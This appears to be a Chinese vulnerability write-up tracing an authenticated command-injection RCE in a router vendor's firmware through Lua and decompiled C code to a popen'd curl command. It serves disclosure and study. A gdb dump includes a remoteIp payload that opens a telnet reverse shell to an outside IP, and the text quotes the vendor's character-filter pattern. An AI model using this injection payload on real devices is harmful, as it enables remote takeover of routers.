一 前言
这是我收获的第一个CVE编号,在复现了winmt师傅的CVE-2023-34644后,他告诉我最新的固件虽然做了一些简单的处理,导致无法在未授权的情况下RCE,但因为没有从根源上对命令执行点做限制,所以在授权后,仍然可以进行RCE。我对最新的固件进行了分析,完整记录了授权后的RCE漏洞从分析到利用的过程。从提交漏洞到现在也有半年的时间了,并且某厂商官网也已经发布了最新的固件,现将该文章分享出来,供大家进行学习和研究。
CVE-2023-34644文章中的部分内容有相似之处,因为对前期的lua文件分析基本一致。为了保证读任何一篇单独的文章都较为通顺和连贯,因此就保留了两篇文章中相似的部分。二 仿真环境搭建
仿真环境搭建请参考:https://bbs.kanxue.com/thread-277386.htm#msg_header_h2_4
qemu的启动脚本如下:#!/bin/bash sudo qemu-system-mipsel -cpu 74Kf -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_squeeze_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic
vmlinux-3.2.0-4-4kc-maltadebian_squeeze_mipsel_standard.qcow2文件从https://people.debian.org/~aurel32/qemu/mipsel/进行下载。qemu启动脚本之前,执行下面的脚本,创建一个网桥。#!/bin/sh #sudo ifconfig eth0 down # 首先关闭宿主机网卡接口 sudo brctl addbr br0 # 添加一座名为 br0 的网桥 sudo brctl addif br0 ens33 # 在 br0 中添加一个接口 sudo brctl stp br0 off # 如果只有一个网桥,则关闭生成树协议 sudo brctl setfd br0 1 # 设置 br0 的转发延迟 sudo brctl sethello br0 1 # 设置 br0 的 hello 时间 sudo ifconfig br0 0.0.0.0 promisc up # 启用 br0 接口 sudo ifconfig ens33 0.0.0.0 promisc up # 启用网卡接口 sudo dhclient br0 # 从 dhcp 服务器获得 br0 的 IP 地址 sudo brctl show br0 # 查看虚拟网桥列表 sudo brctl showstp br0 # 查看 br0 的各接口信息 sudo tunctl -t tap0 -u root # 创建一个 tap0 接口,只允许 root 用户访问 sudo brctl addif br0 tap0 # 在虚拟网桥中增加一个 tap0 接口 sudo ifconfig tap0 0.0.0.0 promisc up # 启用 tap0 接口 sudo brctl showstp br0
三 漏洞分析
lua文件调用链分析
新版本219调用链分析
usr/lib/lua/luci/modules/cmd.lua文件中有如下代码,容易让初学者搞混,所以在此简单说明一下:local opt = {"add", "del", "update", "get", "set", "clear", 'doc'} acConfig, devConfig, devSta, devCap = {}, {}, {}, {} for i = 1, #opt do ...... devSta[opt[i]] = function(params) local model = require "dev_sta" params.method = opt[i] params.cfg_cmd = "dev_sta" local data, back, ip, password, shell = doParams(params) return fetch(model.fetch, shell, params, opt[i], params.module, data, back, ip, password) end ...... end
opt里面装了字符串adddelupload等字符串,然后又定义了四张空表acConfigdevConfigdevStadevCap,接下来是一个for循环来遍历opt表。devSta[opt[i]] = function(params)这行代码为例,假设现在opt[i]是元素add,function(params)这里是声明了一个匿名函数,因为函数也是一个变量,这个变量被直接存储到了devSta表中,以键值的形式存在,键就是字符串add而值就是这个函数,之后调用这个函数的话可以直接写devSta["add"]()function hello() local model = require "dev_sta" params.method = opt[i] params.cfg_cmd = "dev_sta" local data, back, ip, password, shell = doParams(params) return fetch(model.fetch, shell, params, opt[i], params.module, data, back, ip, password) end devSta["add"] = hello --假设此时遍历到了opt表中的add元素
doParamsfetch函数(实际上通过上面的分析也知道,这里只是定义了这些函数,并没有进行调用)/api/cmd的这条链,在/usr/lib/lua/luci/controller/eweb/api.lua文件中存在entry({"api", "cmd"}, call("rpc_cmd"), nil)这行代码,意味着授权后访问/api/cmd路径时,可以调用rpc_cmd函数。function rpc_cmd() local jsonrpc = require "luci.utils.jsonrpc" local http = require "luci.http" local ltn12 = require "luci.ltn12" local _tbl = require "luci.modules.cmd" http.prepare_content("application/json") ltn12.pump.all(jsonrpc.handle(_tbl, http.source()), http.write) end
rpc_cmd函数得知_tbl已经包含了cmd.lua中所有变量的定义(上文已经分析过了),主要是ac_configdev_configdev_sta这三个表包含了adddelupdategetsetcleardoc这些操作,而devCap表只有get。local opt = {"add", "del", "update", "get", "set", "clear", 'doc'} acConfig, devConfig, devSta, devCap = {}, {}, {}, {} for i = 1, #opt do acConfig[opt[i]] = function(params) local model = require "ac_config" params.method = opt[i] params.cfg_cmd = "ac_config" local data, back, ip, password, shell = doParams(params) return fetch(model.fetch, shell, params, opt[i], params.module, data, back, ip, password) end devConfig[opt[i]] = function(params) local model = require "dev_config" params.method = opt[i] params.cfg_cmd = "dev_config" local data, back, ip, password, shell = doParams(params) return fetch(model.fetch, shell, params, opt[i], params.module, data, back, ip, password) end devSta[opt[i]] = function(params) local model = require "dev_sta" params.method = opt[i] params.cfg_cmd = "dev_sta" local data, back, ip, password, shell = doParams(params) return fetch(model.fetch, shell, params, opt[i], params.module, data, back, ip, password) end if opt[i] == "get" then devCap[opt[i]] = function(params) local model = require "dev_cap" params.method = opt[i] params.cfg_cmd = "dev_cap" local data, back, ip, password, shell = doParams(params) return fetch(model.fetch, shell, params, opt[i], params.module, ip, password) end end if opt[i] == "doc" then syshell = function(params) local tool = require "luci.utils.tool" return tool.doc(params) end end end
rpc_cmd函数中的这行代码ltn12.pump.all(jsonrpc.handle(_tbl, http.source()), http.write)jsonrpc.handle函数的参数是_tbl,看下luci.utils.jsonrpc文件中的handle函数,发现又将参数tbl传给了resolve,同时传入的还有报文中的method字段。function handle(tbl, rawsource, ...) ...... if stat then if type(json.method) == "string" then local method = resolve(tbl, json.method) if method then response = reply(json.jsonrpc, json.id, proxy(method, json.params or {})) ...... end
resolve函数主要是将mod表中存放键值对中的函数提取出来,假设method为devCap.get,那么下面的代码最后可以将匿名函数devCap["get"]赋值给mod并返回:function resolve(mod, method) local path = luci.util.split(method, ".") for j = 1, #path - 1 do if not type(mod) == "table" then break end mod = rawget(mod, path[j]) if not mod then break end end mod = type(mod) == "table" and rawget(mod, path[#path]) or nil if type(mod) == "function" then return mod end end
proxy(method, json.params or {})发现,将刚刚解析的返回值method被proxy函数当做参数,这里的method又传入了luci.util文件中的copcall函数。function proxy(method, ...) local tool = require "luci.utils.tool" local res = {luci.util.copcall(method, ...)} ...... end
copcall函数主要是对coxpcall的一个封装:function copcall(f, ...) return coxpcall(f, copcall_id, ...) end
coxpcall函数内部发现调用了f:function coxpcall(f, err, ...) local res, co = oldpcall(coroutine.create, f) ...... end
oldpcall(coroutine.create, f)这行代码的目的是在一个新的协程中运行函数f。至此开始执行上面提到的匿名函数,重新回顾一下它的代码,该函数调用了doParams对json数据进行解析,随后调用了fetch函数。devSta[opt[i]] = function(params) local model = require "dev_sta" params.method = opt[i] params.cfg_cmd = "dev_sta" local data, back, ip, password, shell = doParams(params) return fetch(model.fetch, shell, params, opt[i], params.module, data, back, ip, password)
fetch函数在cmd.lua文件中已经定义了,这里调用了fn也就是fetch函数传入进来的第一个参数:local function fetch(fn, shell, params, ...) require "luci.json" local tool = require "luci.utils.tool" local _start = os.time() local _res = fn(...) ...... end
fetch函数的第一个参数为model.fetch,model是require "dev_cap.lua"后的结果,所以在cmd.lua的fetch函数内部调用了dev_sta.lua文件中定义的fetch函数,该函数定义如下,能够看到最后是调用了/usr/lib/lua/libuflua.so文件中的client_call函数。function fetch(cmd, module, param, back, ip, password, force, not_change_configId, multi) local uf_call = require "libuflua" ...... local stat = uf_call.client_call(ctype, cmd, module, param, back, ip, password, force, not_change_configId, multi) return stat end
IDA打开/usr/lib/lua/libuflua.so文件,发现并没有看到有定义的client_call函数,不过发现了uf_client_call函数,猜测可能是程序内部进行了关联。shift+f12搜索字符串发现并没有看到client_call(如下图)。
IDA没有把client_call解析成字符串,而是解析成了代码。我这里用010Editor打开该文件进行搜索字符串client_call,成功搜索到后发现其地址位于0xff0处。
IDA确实是将0xff0位置的数据当做了代码来解析,选中这部分数据,按a,就能以字符串的形式呈现了。
client_call进行交叉引用,发现最终调用位置如下,luaL_register是Lua中注册C语言编写的函数,它作用是将C函数添加到一个Lua模块中,使得这些C函数能够从Lua代码中被调用。
void luaL_register (lua_State *L, const char *libname, const luaL_Reg *l);
lua_State *L:Lua状态指针,代表了一个Lua解释器实例。const char *libname:模块的名称,这个名称会在Lua中作为一个全局变量存在,存放模块的函数。const luaL_Reg *l:一个结构体数组,包含要注册到模块中的函数的信息。每个结构体包含函数的名称和相应的C函数指针0x1101C的位置存放的是一个字符串以及一个函数指针(如下图),因此判断出client_call实际就定义在了sub_A00中。
sub_A00函数定义如下,可以看到最后是调用了uf_client_call函数,而在这之前的很多赋值操作如*(_DWORD *)(v3 + 12) = lua_tolstring(a1, 4, 0);,很容易能猜测到其实是在解析Lua传入的各个参数字段。Lua的代码中uf_call.client_call(ctype, cmd, module, param, back, ip, password, force, not_change_configId, multi)这里传入了多个参数,但是sub_A00函数就一个参数a1,结合的操作分析出这里是在解析参数。int __fastcall sub_A00(int a1) { v13[0] = 0; v2 = malloc(52); v3 = v2; if ( v2 ) { memset(v2, 0, 52); v5 = 4; *(_DWORD *)v3 = luaL_checkinteger(a1, 1); *(_DWORD *)(v3 + 4) = luaL_checklstring(a1, 2, 0); v6 = luaL_checklstring(a1, 3, 0); v7 = *(_DWORD *)v3; *(_DWORD *)(v3 + 8) = v6; if ( v7 != 3 ) { *(_DWORD *)(v3 + 12) = lua_tolstring(a1, 4, 0); *(_BYTE *)(v3 + 41) = lua_toboolean(a1, 5) == 1; v5 = 6; *(_BYTE *)(v3 + 40) = 1; } *(_DWORD *)(v3 + 20) = lua_tolstring(a1, v5, 0); *(_DWORD *)(v3 + 24) = lua_tolstring(a1, v5 + 1, 0); v8 = v5 + 2; if ( *(_DWORD *)v3 ) { if ( *(_DWORD *)v3 == 2 ) { v8 = v5 + 3; *(_BYTE *)(v3 + 43) = lua_toboolean(a1, v5 + 2) == 1; } } else { *(_BYTE *)(v3 + 43) = lua_toboolean(a1, v5 + 2) == 1; v8 = v5 + 4; *(_BYTE *)(v3 + 44) = lua_toboolean(a1, v5 + 3) == 1; } *(_BYTE *)(v3 + 48) = lua_toboolean(a1, v8) == 1; v4 = uf_client_call(v3, v13, 0); } ......
uf_client_call函数是一个引用外部库的函数,用grep在整个文件系统搜索字符串uf_client_call,结合/usr/lib/lua/libuflua.so文件中引用的外部库进行分析,最终判断出uf_client_call函数定义在/usr/lib/libunifyframe.so。
uf_client_call函数首先判断了method的类型,然后解析出报文中各字段的值,并将其键值对添加到一个JSON对象中,接着将最终处理好的JSON对象转换为JSON格式的字符串,通过uf_socket_msg_write用socket套接字进行数据传输。int __fastcall uf_client_call(_DWORD *a1, int a2, int *a3) { ...... v5 = json_object_new_object(); ...... switch ( *a1 )//这里的*a1指的就是uf_call.client_call函数的第一个参数ctype,他取决于method它在dev_sta.lua文件中被赋值为了2 { case 0: v15 = ((int (*)(void))strlen)() + 10; ...... v13 = "acConfig.%s"; goto LABEL_22; case 1: v14 = ((int (*)(void))strlen)() + 11; ...... v13 = "devConfig.%s"; goto LABEL_22; case 2: v8 = ((int (*)(void))strlen)() + 8; ...... v13 = "devSta.%s"; goto LABEL_22; case 3: v16 = ((int (*)(void))strlen)() + 8; ...... v13 = "devCap.%s"; goto LABEL_22; case 4: v17 = ((int (*)(void))strlen)() + 7; ...... LABEL_22://接下来使用了大量的json_object_object_add函数,该函数的作用是在已有的JSON对象中添加一个键值对,以json_object_object_add(v20, "remoteIp", v23)函数为例,作用是将{"remote",v23}这个键值对添加到v20所指的JSON对象中, json_object_object_add(v5, "method", v19); v20 = json_object_new_object(); ...... v21 = json_object_new_string(a1[2]); json_object_object_add(v20, "module", v21); v22 = a1[5]; if ( !v22 ) goto LABEL_35; json_object_object_add(v20, "remoteIp", v23); LABEL_35: v25 = a1[6]; if ( v25 ) { v26 = json_object_new_string(v25); ...... json_object_object_add(v20, "remotePwd", v26); } if ( a1[9] ) { ...... json_object_object_add(v20, "buf", v27); } if ( *a1 ) { if ( *a1 != 2 ) { v28 = *((unsigned __int8 *)a1 + 45); goto LABEL_58; } if ( *((_BYTE *)a1 + 42) ) { v30 = json_object_new_boolean(1); if ( v30 ) { v31 = v20; v32 = "execute"; goto LABEL_56; } } } else { if ( *((_BYTE *)a1 + 43) ) { v29 = json_object_new_boolean(1); if ( v29 ) json_object_object_add(v20, "force", v29); } if ( *((_BYTE *)a1 + 44) ) { v30 = json_object_new_boolean(1); if ( v30 ) { v31 = v20; v32 = "configId_not_change"; LABEL_56: json_object_object_add(v31, v32, v30); goto LABEL_57; } } } LABEL_57: v28 = *((unsigned __int8 *)a1 + 45); LABEL_58: if ( v28 ) { v33 = json_object_new_boolean(1); if ( v33 ) json_object_object_add(v20, "from_url", v33); } if ( *((_BYTE *)a1 + 47) ) { v34 = json_object_new_boolean(1); if ( v34 ) json_object_object_add(v20, "from_file", v34); } if ( *((_BYTE *)a1 + 48) ) { v35 = json_object_new_boolean(1); if ( v35 ) json_object_object_add(v20, "multi", v35); } if ( *((_BYTE *)a1 + 46) ) { v36 = json_object_new_boolean(1); if ( v36 ) json_object_object_add(v20, "not_commit", v36); } if ( *((_BYTE *)a1 + 40) ) { v37 = json_object_new_boolean(*((unsigned __int8 *)a1 + 41) ^ 1); if ( v37 ) json_object_object_add(v20, "async", v37); } v38 = (_BYTE *)a1[3]; if ( !v38 || !*v38 ) goto LABEL_78; v39 = json_object_new_string(v38); json_object_object_add(v20, "data", v39); LABEL_78: v41 = (_BYTE *)a1[4]; if ( v41 && *v41 ) { v42 = json_object_new_string(v41); if ( !v42 ) { json_object_put(v20); json_object_put(v5); v40 = 630; goto LABEL_82; } json_object_object_add(v20, "device", v42); } json_object_object_add(v5, "params", v20);//将上面的v20当做了params的值,向v5中添加新的键值对 v43 = json_object_to_json_string(v5);//json_object_to_json_string作用是将JSON对象转换为JSON格式的字符串 ...... v44 = uf_socket_client_init(0); ...... v50 = strlen(v43); uf_socket_msg_write(v44, v43, v50);//最终调用uf_socket_msg_write,用socket实现了进程间通信,将解析好的json数据发送给其他进程进行处理 ......
uf_socket_msg_write进行数据发送,那么肯定就在一个地方有用uf_socket_msg_read函数进行数据的接收,用grep进行字符串搜索,发现/usr/sbin/unifyframe-sgi.elf文件,并且该文件还位于/etc/init.d目录下,这意味着该进程最初就会启动并一直存在,所以判断出这个unifyframe-sgi.elf文件就是用来接收libunifyframe.so文件所发送过来的数据。
219版本之前的调用链
219之前该调用链可以通杀该厂商大部分设备。下面介绍的这条调用链所出示的代码均来自某型号的204版本。/usr/lib/lua/luci/controller/eweb/api.lua文件中,配置了路由entry({"api", "auth"}, call("rpc_auth"), nil).sysauth = false/api/auth路径时,将调用rpc_auth。在luci框架中sysauth属性控制是否需要进行系统级的用户认证才能访问该路由,这里的sysauth属性为false,表示无需进行系统认证即可访问。rpc_auth函数首先引入了一些模块,然后获取HTTP_CONTENT_LENGTH的长度是否大于1000字节,如果不大于的话会将准备HTTP响应的类型设置为application/json,下面的handle函数第一个参数_tbl传入的是luci.modules.noauth文件返回的内容。function rpc_auth() local jsonrpc = require "luci.utils.jsonrpc" local http = require "luci.http" local ltn12 = require "luci.ltn12" local _tbl = require "luci.modules.noauth" if tonumber(http.getenv("HTTP_CONTENT_LENGTH") or 0) > 1000 then http.prepare_content("text/plain") -- http.write({code = "1", err = "too long data"}) return "too long data" end http.prepare_content("application/json") ltn12.pump.all(jsonrpc.handle(_tbl, http.source()), http.write) end
handle函数内部后的流程与分析最新版的步骤一样,就不再赘述,最后的结果就是能在这里触发noauth文件中的merge函数(前提是报文中要设置method字段的值为merge)noauth的文件中定义了merge函数:function merge(params) local cmd = require "luci.modules.cmd" return cmd.devSta.set({device = "pc", module = "networkId_merge", data = params, async = true}) end
merge函数又调用了/usr/lib/lua/luci/modules/cmd.lua文件中的devSta.set函数,之后的过程又和上文中分析最新版的步骤一样,也不再重复记录。devSta[opt[i]] = function(params) local model = require "dev_sta" params.method = opt[i] params.cfg_cmd = "dev_sta" local data, back, ip, password, shell = doParams(params) return fetch(model.fetch, shell, params, opt[i], params.module, data, back, ip, password)
为什么最新版不能再走这条链了?
219版本,在noauth.lua文件中的merge函数,加入了对params中危险字符的过滤,调用了includeXxs和includeQuote函数,对换行符、回车符、反引号、&、$、;、|等符号都做了过滤,这就意味着后续无法再进行命令注入了。而219版本只在这里进行了危险字符的过滤,只要从其他地方调用到诸如dev_capdev_sta表中的函数依然可以进行命令注入。function merge(params) local cmd = require "luci.modules.cmd" local tool = require("luci.utils.tool") local _strParams = luci.json.encode(params) if tool.includeXxs(_strParams) or tool.includeQuote(_strParams) then tool.eweblog(_strParams, "MERGE FAILED INVALID DATA") return 'INVALID DATA' end return cmd.devSta.set({ device = "pc", module = "networkId_merge", data = params, async = true }) end function includeXxs(str) local ngstr = "[nr`&$;|]" return string.match(str, ngstr) ~= nil end function includeQuote(str) return string.match(str, "(['])") ~= nil end
漏洞文件分析
/usr/sbin/unifyframe-sgi.elf文件,整体流程是在main函数调用了三个关键函数uf_socket_msg_readparse_contentadd_pkg_cmd2_task,他们的作用分别为接收数据、解析数据、执行命令。字段解析
uf_socket_msg_read函数将json数据读入到内存中,地址为v31+1。//uf_socket_msg_read v31 = (_DWORD *)malloc_pkg(); ...... pthread_mutex_lock(v29 + 5); *v31 = v29; v52 = uf_socket_msg_read(*v29, v31 + 1); pthread_mutex_unlock(v29 + 5);
gdb来查看读入的数据这里只为说明gdb可以查看内存中读入的数据,文章前后发送的报文并不一样。pwndbg> x/4s 0x623850 0x623850: "{ "method": "devConfig.get", "params": { "module": "123", "remoteIp": "$(mkfifo \/tmp\/test;telnet 192.168.45.203 6666 0<\/tmp\/test|\/bin\/sh > \/tmp\/test)", "remotePwd": "", "async": true, "data": "... 0x623918: ""{\"kkk\":\"abc\"}" } }"
json数据的各字段进行解析在parse_content函数中完成,该函数首先判断了params和method字段是否存在,然后在method字段不为cmdArr的情况下,调用parse_obj2_cmd函数进一步对字段进行解析。//parse_content v3 = json_tokener_parse(); v4 = v3; ...... v6 = json_object_object_get_ex(v3, "params", &v18); v7 = v4; if ( v6 != 1 )//检查了 params 字段是否存在值 { LABEL_27: json_object_put(v7); return -1; } if ( json_object_object_get_ex(v4, "method", v19) != 1 )//检查了 method 字段是否存在值 { LABEL_26: v7 = v4; goto LABEL_27; } v8 = json_object_get_string(v19[0]); if ( !v8 ) { ...... } if ( strstr(v8, "cmdArr") )//因为发送的 method 字段不为 cmdArr,所以进入 else { ...... } else { ...... v16 = parse_obj2_cmd(v4); //进行数据解析的具体位置,v4为Json对象 *v15 = v16; if ( !v16 ) { ...... } pkg_add_cmd(a1, v15); v15[2] = 0; }
parse_obj2_cmd函数中具体的解析了各个字段及类型并把它们记录到一个堆块中,最终返回该堆块地址,便于之后的访问。想知道POC的编写格式就要对此处进行逆向分析,具体分析结果已写在注释中。//parse_obj2_cmd v2 = malloc(0x34);//创建了一个堆块,用于记录和存储接下来的各种信息,该函数最终会返回这个堆块地址 v3 = v2; ...... if ( json_object_object_get_ex(a1, "params", &v38) != 1 )//判断params字段是否存在,存在的话将值赋给v38 { ...... } if ( json_object_object_get_ex(a1, "method", &v37) != 1 )//判断method字段是否存在,存在的话将值赋给v37 { ...... } v4 = json_object_get_string(v37);//获取到method的值,下面去匹配对应的操作,各种操作都对应一个数字,该数字放在了堆块的第一个指针处 v5 = v4; ...... if ( strstr(v4, "devSta") ) { v6 = 2; } else { if ( strstr(v5, "acConfig") ) { *(_DWORD *)v3 = 0; goto LABEL_21; } if ( strstr(v5, "devConfig") ) { *(_DWORD *)v3 = 1; goto LABEL_21; } if ( strstr(v5, "devCap") ) { v6 = 3; } else { if ( !strstr(v5, "ufSys") ) { uf_log_printf(uf_log, (const char *)dword_4219EC, "sgi.c", "parse_obj2_cmd", 274); goto LABEL_109; } v6 = 4; } } *(_DWORD *)v3 = v6; LABEL_21: v7 = strchr(v5, 46);//此处的strchr与strdup函数配合将method字段中xxx.xxx的字符串进行了分割,假设最初method为devConfig.get,那么此处会将get放入堆块中的第二个指针处 v8 = strdup(v7 + 1); *(_DWORD *)(v3 + 4) = v8; if ( json_object_object_get_ex(v38, "module", &v37) != 1 )//判断params字段中是否存在module这个值,存在的话将module的值放入v37中,不存在直接返回 { ...... } v10 = json_object_get_string(v37); if ( !v10 ) { uf_log_printf(uf_client_log, "(%s %s %d)obj_module is null", "sgi.c", "parse_obj2_cmd", 294); goto LABEL_109; } v11 = strdup(v10); *(_DWORD *)(v3 + 8) = v11;//将module字段的值放到堆块的第三个指针中 if ( json_object_object_get_ex(v38, "remoteIp", &v37) == 1 && (unsigned int)(json_object_get_type(v37) - 5) < 2 )//这里判断params字段中remoteIp是否存在,存在的话将remoteIp的值赋给v37,同时对remoteIp值的类型做了检查,这里其实就要它的类型为string { v12 = json_object_get_string(v37); if ( v12 ) { v13 = strdup(v12); *(_DWORD *)(v3 + 20) = v13;//将remoteIp的值放入堆块的第六个指针中 ...... } } else { *(_DWORD *)(v3 + 20) = 0; } if ( json_object_object_get_ex(v38, "remotePwd", &v37) == 1 && json_object_get_type(v37) == 5 )//作用同上类似,这里要求remotePwd的类型为array,但是如果传入array类型的话,前端做了相应的检查导致异常,因此猜测这里应该是写的Bug { v14 = json_object_get_string(v37); if ( v14 ) { v15 = strdup(v14); *(_DWORD *)(v3 + 24) = v15; ...... } } v16 = *(_DWORD *)v3 != 2; *(_BYTE *)(v3 + 40) = 0; *(_BYTE *)(v3 + 41) = v16; if ( json_object_object_get_ex(v38, "async", &v37) == 1 ) { v17 = (_BYTE *)sub_404BAC(v37); v18 = v17; if ( v17 ) { if ( *v17 == 48 || !strcmp(v17, "false") ) { *(_BYTE *)(v3 + 40) = 1; *(_BYTE *)(v3 + 41) = 1; } if ( *v18 == 49 || !strcmp(v18, "true") ) *(_WORD *)(v3 + 40) = 1; free(v18); } } if ( json_object_object_get_ex(v38, "force", &v37) == 1 ) { v19 = (_BYTE *)sub_404BAC(v37); v20 = v19; if ( v19 ) { if ( *v19 == 49 || !strcmp(v19, "true") ) *(_BYTE *)(v3 + 43) = 1; free(v20); } } if ( json_object_object_get_ex(v38, "configId_not_change", &v37) == 1 ) { v21 = (_BYTE *)sub_404BAC(v37); v22 = v21; if ( v21 ) { if ( *v21 == 49 || !strcmp(v21, "true") ) *(_BYTE *)(v3 + 44) = 1; free(v22); } } if ( json_object_object_get_ex(v38, "from_url", &v37) == 1 ) { v23 = (_BYTE *)sub_404BAC(v37); v24 = v23; if ( v23 ) { if ( *v23 == 49 || !strcmp(v23, "true") ) *(_BYTE *)(v3 + 45) = 1; free(v24); } } if ( json_object_object_get_ex(v38, "from_file", &v37) == 1 ) { v25 = (_BYTE *)sub_404BAC(v37); v26 = v25; if ( v25 ) { if ( *v25 == 49 || !strcmp(v25, "true") ) *(_BYTE *)(v3 + 47) = 1; free(v26); } } if ( json_object_object_get_ex(v38, "multi", &v37) == 1 ) { v27 = (_BYTE *)sub_404BAC(v37); v28 = v27; if ( v27 ) { if ( *v27 == 49 || !strcmp(v27, "true") ) *(_BYTE *)(v3 + 48) = 1; free(v28); } } if ( json_object_object_get_ex(v38, "not_commit", &v37) == 1 ) { v29 = (_BYTE *)sub_404BAC(v37); v30 = v29; if ( v29 ) { if ( *v29 == 49 || !strcmp(v29, "true") ) *(_BYTE *)(v3 + 46) = 1; free(v30); } } if ( json_object_object_get_ex(v38, "execute", &v37) == 1 ) { v31 = (_BYTE *)sub_404BAC(v37); v32 = v31; if ( v31 ) { if ( *v31 == 49 || !strcmp(v31, "true") ) *(_BYTE *)(v3 + 42) = 1; free(v32); } } v33 = v3; if ( json_object_object_get_ex(v38, "data", &v37) == 1 && (unsigned int)(json_object_get_type(v37) - 4) < 3 )//判断params字段中是否存在data,如果存在的话将其赋值给v37,并且检查了data的值类型,只能为object,array,string三种类型,然后将data的值放到堆块的第四个指针处 { v34 = json_object_get_string(v37); if ( v34 ) { v35 = strdup(v34); *(_DWORD *)(v3 + 12) = v35; if ( !v35 ) { v9 = 470; goto LABEL_108; } } } return v33;//返回堆块地址
xxx代表有些保留字段,或者是一些标志位,它们在后续利用过程中并不重要,暂不详细记录。
GDB调试到此处看到的各字段信息如下:parse_obj2_cmd函数结束后,会执行pkg_add_cmd(a1, v15),它的核心作用就是在a1这个数据结构中记录了v15的指针,使得后续操作通过a1访问到刚刚解析出来的各个字段。不过这pkg_add_cmd函数里有一个谜之操作,在这行代码中*(_DWORD *)(a1 + 92) = a2 + 13是把a2也就是v15的值加上了13存储到了a1中,而通过后续的分析得知,之后访问这个v15的堆块是通过*(a1+92)-13得到的地址。存的时候+13,访问的时候-13,这里没太理解但并不影响我们后续的分析。触发漏洞的调用链分析
main ==> add_pkg_cmd2_task ==> uf_cmd_call ==> ufm_handle ==> remote_call ==>sub_41A148
json数据解析完成后,会调用add_pkg_cmd2_task,该函数通过访问之前解析出的各个字段,判断method是不是devCap,如果是的话可以调用后续的漏洞函数(不是devCap也可以触发漏洞但是调用链走的并不是我分析的这条)。//add_pkg_cmd2_task if ( dword_43897C < 1001 )//这里正常就可以进入 { pthread_mutex_lock(*a1 + 20); v3 = (_DWORD *)a1[22];//这个a1[22]也就是上面提到的*(a1+92) v4 = v3 - 13;//当时存地址时加了13,这里又减了13,所以v4就是上面记录了解析json各字段的那个堆块地址 for ( i = *v3 - 52; ; i = *(_DWORD *)(i + 52) - 52 ) { if ( v4 + 13 == a1 + 22 ) { pthread_mutex_unlock(*a1 + 20); return 0; } v6 = malloc(20); v7 = (int **)v6; ...... v10 = (int *)(v6 + 4); v7[2] = v10; v7[1] = v10; *v7 = v4; v7[4] = (int *)(v7 + 3); v7[3] = (int *)(v7 + 3); ...... *v7 = v4; v11 = (_DWORD *)*v4; v12 = *(_DWORD *)*v4; if ( v12 == 3 )//触发uf_cmd_call函数的关键就是method值的操作类型要为devCap,才能执行break跳出循环,调用uf_cmd_call函数(method为devConfig.get时,依然可以完成攻击,不过走的就是其他链了) break; if ( v12 == 4 ) { gettimeofday(v4 + 5, 0); uf_sys_handle(**v7, v4 + 1); LABEL_22: gettimeofday(v4 + 7, 0); sub_40B404(v7); goto LABEL_23; } if ( v12 == 2 && !strcmp(v11[1], "get") && !v11[9] && uf_cmd_buf_exist_check(v11[2], 2, v11[3], v4 + 1) )//这个v12也就是解析的Operation type值 { ...... } sub_40B0C4(v7); LABEL_23: v4 = (int *)i; } gettimeofday(v4 + 5, 0); if ( uf_cmd_call(*v4, v4 + 1) )//后续的漏洞触发是在这个函数中 v13 = 2; else v13 = 1; v4[12] = v13; goto LABEL_22; } ...... return v1;
uf_cmd_call函数://uf_cmd_call v2 = *(const char **)(a1 + 4); if ( !v2 || (v3 = *(_DWORD *)a1, *(_DWORD *)a1 >= 6u) || (v4 = *(const char **)(a1 + 8)) == 0 )//这里检查了operator是否为空,Operation type的合法性检查以及module_value是否存在,在我们发送的报文中是不会进入这个if的 { ...... } memset(v103, 0, 108); if ( v3 == 3 )//因为操作类型设置为devCap,所以这个if可以进来 { ...... v5 = *(const char **)(a1 + 20);//这里取了remoteIp字段 if ( !v5 || !*v5 )//判断remoteIp字段是否存在 goto LABEL_250; v6 = a1; if ( !is_self_ip(*(_DWORD *)(v6 + 20)) )//is_self_ip函数正常情况下返回的是0,这个if可以进入 { remote_call((int *)a1, (const char **)a2);//后续的漏洞触发是在这个函数中 } ......
remote_call函数://remote_call v9 = (const char *)a1[5];// v9为remoteIp字段 if ( !strcmp(a1[2], dword_4232A8) && *a1 == 5 )// 拿module字段中的值与字符串esw做比较,这个if进不去 { ...... } ...... for ( i = *(const char **)((char *)&sid_list_by_ip + v11); ; i = *(const char **)i )// 这个if会进去 { if ( i == (char *)&sid_list_by_ip + v11 ) // 这个if也会进去 { pthread_rwlock_unlock(&sid_mutex); goto LABEL_35; // 跳转至触发漏洞函数 } ...... LABEL_35: v14 = sub_41A148((int)a1);//该函数存在最终的漏洞点 ...... return 0;
sub_41A148。//sub_41A148 v2 = *(_DWORD *)(a1 + 24);//v2为remotePwd的值 v19 = 0; if ( v2 )//因为remotePwd字段没有传,所以这里为空,进入else { ...... } else { ufm_read_file("/etc/rg_config/admin", &v19);// 没有这个文件,什么都读不出来 if ( !v19 ) { v19 = (const char *)strdup("U2FsdGVkX18POF0/cM8IwywAcZUK8zQngpUv7C2zKng=");// 如果什么都没有读到的话,就将这个数据作为v19 ...... } } ...... snprintf( v17, 511, "curl -m 5 -s -k -X POST http://%s/cgi-bin/luci/api/auth -H content-type:application/json -d '{"method":"login","" "params":{"username":"admini","password":"%s","encry":"true"}}'", *(const char **)(a1 + 20),//此处会将remoteIp字段拼接进去 v19); ...... v18 = 0; if ( ufm_popen(v17, &v18) || !v18 )//最终由ufm_popen函数导致了命令执行 { uf_log_printf(uf_log, "ERROR (%s %s %d)curl get sid failed!", "ufm_remote_call.c", "fetch_get_sid", 289); return 0; } ......
为什么remotePwd字段无法注入命令?
204固件中,其实是可以从remotePwd字段中注入命令并执行的,而且在最新的固件中,也可以看到这里判断了remotePwd是否存在,如果存在的话也可以进行拼接,最终导致命令执行,相关代码如下。v2 = *(_DWORD *)(a1 + 24);//v19为remotePwd的值 v19 = 0; if ( v2 ) { v19 = (const char *)strdup(v2); ....... } ...... snprintf( v17, 511, "curl -m 5 -s -k -X POST http://%s/cgi-bin/luci/api/auth -H content-type:application/json -d '{"method":"login","" "params":{"username":"admini","password":"%s","encry":"true"}}'", *(const char **)(a1 + 20), v19);//此处是拼接v19的 if ( ufm_popen(v17, &v18) || !v18 )//loophole { ...... }
